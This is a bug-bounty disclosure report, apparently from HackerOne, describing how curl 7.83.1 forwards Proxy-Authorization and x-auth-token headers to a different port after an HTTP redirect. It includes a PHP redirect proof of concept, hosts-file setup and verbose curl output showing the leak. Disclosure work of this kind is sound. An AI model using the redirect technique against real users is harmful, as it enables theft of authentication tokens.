Lucene search

IylzH1:1568175

HistoryMay 13, 2022 - 11:31 a.m.

curl: Credential leak on redirect

2022-05-1311:31:21

iylz

hackerone.com

311

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

0.001 Low

EPSS

Percentile

38.2%

JSON

Summary:

[add summary of the vulnerability]

Curl can be coaxed to leak user credentials to third-party host by issuing HTTP redirect , like the Proxy-Authorization 、x-auth-token header. It is a bypass of fix https://hackerone.com/reports/1547048 , CVE-2022-27776 .

Steps To Reproduce:

[add details for how we can reproduce the issue]

Create a 302.php file, such as:

&lt;?php
header("Location: http://a.com:8000");
?&gt;

Add the 2 record in the /etc/hosts file:

127.0.0.1 a.com
127.0.0.1 b.com

curl -H “Proxy-Authorization: secrettoken” http://b.com/302.php -vv -L
The redirect will be followed, and the confidential headers sent over insecure HTTP to the specified port:

# curl -H "Proxy-Authorization: secrettoken" http://b.com/302.php -vv -L
*   Trying 127.0.0.1:80...
* Connected to b.com (127.0.0.1) port 80 (#0)
&gt; GET /302.php HTTP/1.1
&gt; Host: b.com
&gt; User-Agent: curl/7.83.1
&gt; Accept: */*
&gt; Proxy-Authorization: secrettoken
&gt;
* Mark bundle as not supporting multiuse
&lt; HTTP/1.1 302 Found
&lt; Date: Fri, 13 May 2022 11:22:06 GMT
&lt; Server: Apache/2.4.6 (CentOS) PHP/5.4.16
&lt; X-Powered-By: PHP/5.4.16
&lt; Location: http://a.com:8000
&lt; Content-Length: 0
&lt; Content-Type: text/html; charset=UTF-8
&lt;
* Connection #0 to host b.com left intact
* Clear auth, redirects to port from 80 to 8000
* Issue another request to this URL: 'http://a.com:8000/'
*   Trying 127.0.0.1:8000...
* Connected to a.com (127.0.0.1) port 8000 (#1)
&gt; GET / HTTP/1.1
&gt; Host: a.com:8000
&gt; User-Agent: curl/7.83.1
&gt; Accept: */*
&gt; Proxy-Authorization: secrettoken
&gt;

curl -H “x-auth-token: secrettoken” http://b.com/302.php -vv -L

# curl -H "x-auth-token: secrettoken" http://b.com/302.php -vv -L
*   Trying 127.0.0.1:80...
* Connected to b.com (127.0.0.1) port 80 (#0)
&gt; GET /302.php HTTP/1.1
&gt; Host: b.com
&gt; User-Agent: curl/7.83.1
&gt; Accept: */*
&gt; x-auth-token: secrettoken
&gt;
* Mark bundle as not supporting multiuse
&lt; HTTP/1.1 302 Found
&lt; Date: Fri, 13 May 2022 11:24:15 GMT
&lt; Server: Apache/2.4.6 (CentOS) PHP/5.4.16
&lt; X-Powered-By: PHP/5.4.16
&lt; Location: http://a.com:8000
&lt; Content-Length: 0
&lt; Content-Type: text/html; charset=UTF-8
&lt;
* Connection #0 to host b.com left intact
* Clear auth, redirects to port from 80 to 8000
* Issue another request to this URL: 'http://a.com:8000/'
*   Trying 127.0.0.1:8000...
* Connected to a.com (127.0.0.1) port 8000 (#1)
&gt; GET / HTTP/1.1
&gt; Host: a.com:8000
&gt; User-Agent: curl/7.83.1
&gt; Accept: */*
&gt; x-auth-token: secrettoken

The reason for the problem is that curl’s filtering of authentication header header is incomplete. The Proxy-Authorization and x-auth-token headers are not considered, only restrict the delivery of Cookies and Authorization.